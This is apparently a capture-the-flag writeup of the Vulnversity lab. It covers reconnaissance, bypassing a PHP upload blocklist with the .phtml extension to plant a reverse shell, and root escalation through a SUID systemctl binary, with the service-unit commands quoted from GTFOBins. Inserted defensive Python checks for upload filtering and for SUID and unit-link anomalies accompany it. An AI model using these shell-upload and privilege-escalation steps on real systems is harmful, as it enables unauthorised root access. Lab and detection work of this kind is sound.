
Vulnversity writeup [thm]


Learn about active recon, web app attacks and privilege escalation.

This writeup of Vulnversity will be brief and not very detailed.


Reconnaissance

$: nmap -A -p- $target

Gives you all the information you need.

Locating directories using GoBuster

$: gobuster dir -u $target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Compromise the webserver

Just follow the instructions.

We found an upload page and we want to upload a reverse shell. The extension .php is blocked.

Create a file containing the following list of PHP extensions:

.php
.php3
.php4
.php5
.phtml

Configure BurpSuite to intercept all your browser traffic. Upload a file, grab the request and send it to Intruder. Click on "Payloads" and select "Sniper". Go to "Positions", find the filename and "Add §" around the extension.

By executing this attack we find that the .phtml extension is allowed.

Rename php-reverse-shell.php to php-reverse-shell.phtml. Start listening with netcat, upload and execute the shell.
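The reason the Intruder run above succeeds is that the upload form only blocks the literal ".php" suffix. The following is an added example, not code from the room or from this writeup: it puts that kind of blocklist check beside an allowlist check and runs both over the extension list from the page. The function names, the allowed image extensions and the test filenames are assumptions made for the example.

```python
import os

# PHP-handled extensions tested in the writeup (mirrors the list on the page).
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml"}

# Only the extensions the application actually needs (assumed: an avatar upload).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}


def weak_blocklist_check(filename: str) -> bool:
    """The style of check the room's upload page used: reject only '.php'.

    Returns True if the upload would be accepted. Every other extension the
    PHP handler serves (.php3, .php5, .phtml, ...) is accepted.
    """
    return not filename.lower().endswith(".php")


def allowlist_check(filename: str) -> bool:
    """Hardened check: accept only if the final extension is allowlisted and no
    earlier segment of the name is a script extension.

    The second condition matters because Apache's mod_mime matches handlers on
    any extension in the name, so 'shell.phtml.png' can still run as PHP under
    an AddHandler configuration.
    """
    name = os.path.basename(filename).lower()
    # Strip leading dots so ".phtml" is not parsed as a name with no suffix.
    parts = name.lstrip(".").split(".")
    if len(parts) < 2:
        return False  # no extension at all
    suffixes = {"." + p for p in parts[1:]}
    if not suffixes.isdisjoint(EXECUTABLE_EXTENSIONS):
        return False  # a script extension appears somewhere in the name
    return "." + parts[-1] in ALLOWED_EXTENSIONS


def compare_checks(filenames):
    """Run both checks over a list of names; returns {name: (weak, hardened)}."""
    return {f: (weak_blocklist_check(f), allowlist_check(f)) for f in filenames}


if __name__ == "__main__":
    # Constructed sample names: the shell from the writeup under each extension,
    # plus a legitimate image and a double-extension name.
    samples = ["php-reverse-shell" + e for e in sorted(EXECUTABLE_EXTENSIONS)]
    samples += ["avatar.png", "shell.phtml.png"]
    for name, (weak, hardened) in compare_checks(samples).items():
        print(f"{name:28} blocklist={'accept' if weak else 'reject':6} "
              f"allowlist={'accept' if hardened else 'reject'}")
```

Storing uploads outside the document root and serving them through a handler that never executes scripts is a second, independent layer; the allowlist alone only closes the extension-guessing route the Intruder run exposed.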

What is the name of the user who manages the webserver?

Just look around.

What is the user flag?

You know what to do.

Privilege Escalation

Searching for all SUID files with

$: find / -user root -perm -4000 -exec ls -ldb {} \;

we find /bin/systemctl.

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

sudo install -m =xs $(which systemctl) .

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

From GTFOBins.
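On the defending side, the two things worth watching for after this room are a SUID bit on a binary that a stock image never ships with it (systemctl here) and unit symlinks that point at files under /tmp, which is exactly what the `systemctl link` / `enable --now` sequence leaves behind. The following is an added example, not code from the room or from GTFOBins: it parses constructed output of the `find ... -exec ls -ldb` command above against a baseline and checks a constructed map of unit symlinks against the trusted unit directories. The baseline set, the sample lines and the unit names are assumptions made for the example.

```python
import os
import re

# Constructed sample of `find / -user root -perm -4000 -exec ls -ldb {} \;`
# output; not captured from the room, sizes and dates are made up.
SAMPLE_FIND_OUTPUT = """\
-rwsr-xr-x 1 root root  54256 Mar 26  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root  40432 Mar 26  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 659856 Apr  1  2020 /bin/systemctl
-rwsr-xr-x 1 root root  40152 Mar 26  2019 /bin/mount
"""

# Illustrative baseline of SUID-root binaries a stock image is expected to
# carry (assumed; a real baseline comes from a known-good host of the same build).
SUID_BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/newgrp",
    "/bin/mount", "/bin/umount", "/bin/su",
}

# mode links owner group size month day year-or-time path
_LS_LINE = re.compile(
    r"^(?P<mode>\S{10})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$"
)


def parse_suid_listing(text):
    """Yield (path, owner) for each ls -l line whose owner-execute slot is setuid."""
    for line in text.splitlines():
        m = _LS_LINE.match(line)
        if not m:
            continue
        if m.group("mode")[3] in "sS":  # 's'/'S' in the owner x slot = setuid
            yield m.group("path"), m.group("owner")


def unexpected_suid(text, baseline=SUID_BASELINE):
    """Return root-owned SUID paths that are not in the baseline, sorted."""
    return sorted(
        path for path, owner in parse_suid_listing(text)
        if owner == "root" and path not in baseline
    )


TRUSTED_UNIT_DIRS = (
    "/etc/systemd/system", "/lib/systemd/system", "/usr/lib/systemd/system",
)

# Constructed map of unit symlink -> target, shaped like what `systemctl link`
# followed by `enable --now` creates for a unit file living under /tmp.
SAMPLE_UNIT_LINKS = {
    "/etc/systemd/system/multi-user.target.wants/ssh.service":
        "/lib/systemd/system/ssh.service",
    "/etc/systemd/system/tmp.abc123.service":
        "/tmp/tmp.abc123.service",
    "/etc/systemd/system/multi-user.target.wants/tmp.abc123.service":
        "/tmp/tmp.abc123.service",
}


def untrusted_unit_links(links, trusted=TRUSTED_UNIT_DIRS):
    """Return unit symlinks whose target lives outside the trusted unit dirs."""
    flagged = []
    for link, target in links.items():
        norm = os.path.normpath(target)
        if not any(norm == d or norm.startswith(d + "/") for d in trusted):
            flagged.append(link)
    return sorted(flagged)


if __name__ == "__main__":
    print("SUID not in baseline:", unexpected_suid(SAMPLE_FIND_OUTPUT))
    print("unit links outside trusted dirs:", untrusted_unit_links(SAMPLE_UNIT_LINKS))
```

On a live host the second check would be fed by walking /etc/systemd/system with `os.readlink`; the version here takes a dict so it runs offline. Both checks are cheap enough to schedule, and a SUID bit appearing on systemctl is the finding that turns this room's privesc into a one-liner, so it is the one to alert on.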

Conclusion

BurpSuite is boring and always feels like "cheating" but the privesc was cool. This is the first non-trivial challenge on the Offensive Pentesting path.

Tools used:

  • Nmap
  • Gobuster
  • BurpSuite
  • php-reverse-shell.php
  • Netcat
  • GTFOBins